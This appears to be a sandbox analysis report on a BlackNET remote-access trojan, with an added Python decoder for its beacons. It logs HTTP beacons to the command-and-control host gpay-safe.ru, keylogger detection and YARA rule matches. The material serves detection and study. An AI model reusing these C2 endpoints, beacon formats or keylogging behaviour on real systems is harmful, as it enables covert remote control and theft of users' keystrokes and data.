Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651567513.000000001BED7000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651132557.000000001BED7000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersP
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.647017703.000000001BECF000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com8
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: unknown | DNS traffic detected: queries for: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1 | Host: gpay-safe.ru | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 | Host: gpay-safe.ru
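The beacon URLs above carry their parameters as plain base64 with the trailing `=` padding stripped: `VW5pbnN0YWxs` decodes to `Uninstall`, `T25saW5l` to `Online`, and `SGFDa182NUYxRDNBOQ` to the victim identifier `HaCk_65F1D3A9`, so the tasking can be recovered from a packet capture without running the sample. The Python below does that decoding and a small per-victim triage. It is an added example, not part of the Joe Sandbox report or of the BlackNET code; the request lines are the ones listed in this report, while the function names, the `BEACON_ENDPOINTS` allow-list and the `triage` helper are this example's own.

```python
"""Decode the BlackNET HTTP beacons listed in the report's traffic section.

The request lines in OBSERVED_REQUESTS are copied from the report's
'HTTP traffic detected' entries. Everything else (function names, the
triage helper, the endpoint allow-list) is added for this example and is
not part of the sandbox report or of the BlackNET source.
"""
import base64
import binascii
from typing import Dict, List, Optional
from urllib.parse import urlsplit

C2_HOST = "gpay-safe.ru"  # Host header / DNS query seen in the report

# Request lines as they appear in the report.
OBSERVED_REQUESTS = [
    "GET /x/ HTTP/1.1",
    "GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1",
    "GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1",
    "GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1",
]

# Panel script names observed in this capture; the detector below keys on them.
BEACON_ENDPOINTS = {"receive.php", "getCommand.php"}


def decode_b64_param(value: str) -> Optional[str]:
    """Decode a base64 query value whose '=' padding has been stripped.

    The beacons above carry unpadded base64 ('SGFDa182NUYxRDNBOQ' is 18
    characters, so two '=' are missing). Padding is restored before decoding;
    None is returned for values that are not valid base64 text.
    """
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.urlsafe_b64decode(padded).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _raw_query(query: str) -> Dict[str, str]:
    """Split the query string without urllib's '+' -> ' ' translation.

    parse_qs would turn a '+' inside standard base64 into a space and
    corrupt the value, so the pairs are split by hand.
    """
    pairs = {}
    for item in query.split("&"):
        if "=" in item:
            key, _, val = item.partition("=")
            pairs[key] = val
    return pairs


def parse_beacon(request_line: str) -> dict:
    """Split 'METHOD target HTTP/x.y' into endpoint plus decoded parameters."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = _raw_query(parts.query)
    decoded = {k: decode_b64_param(v) for k, v in params.items()}
    return {
        "method": method,
        "path": parts.path,
        # last path component; '/x/' (the panel root) has none, so keep the path
        "endpoint": parts.path.rsplit("/", 1)[-1] or parts.path,
        # the '/x//' double slash is consistent with the client appending
        # '/script.php' to a C2 path that already ends in '/'
        "double_slash": "//" in parts.path,
        "command": decoded.get("command"),
        # receive.php names the victim 'vicID', getCommand.php names it 'id'
        "victim_id": decoded.get("vicID") or decoded.get("id"),
    }


def is_blacknet_beacon(request_line: str) -> bool:
    """Heuristic: known panel script plus a victim id that decodes cleanly."""
    b = parse_beacon(request_line)
    return b["endpoint"] in BEACON_ENDPOINTS and b["victim_id"] is not None


def triage(request_lines: List[str]) -> Dict[str, List[str]]:
    """Map each decoded victim id to the sorted set of commands it reported."""
    seen: Dict[str, set] = {}
    for line in request_lines:
        b = parse_beacon(line)
        if b["victim_id"] is None:
            continue
        cmds = seen.setdefault(b["victim_id"], set())
        if b["command"]:
            cmds.add(b["command"])
    return {vic: sorted(c) for vic, c in seen.items()}


if __name__ == "__main__":
    for line in OBSERVED_REQUESTS:
        print(is_blacknet_beacon(line), parse_beacon(line))
    print(C2_HOST, triage(OBSERVED_REQUESTS))
```

Beyond the domain itself, three features of this capture are cheap pivots for a network rule: the `/x//` double slash in the path, the fixed Chrome/80 User-Agent on the PHP requests while the initial `GET /x/` sends none, and the same base64 identifier repeated in every request. `BEACON_ENDPOINTS` should be widened for panel builds that use other script names.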

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  Contains functionality to log keystrokes (.Net Source)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: winhost.exe.0.dr, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: winhost.exe.12.dr, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: dropped/winhost.exe, type: DROPPED | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
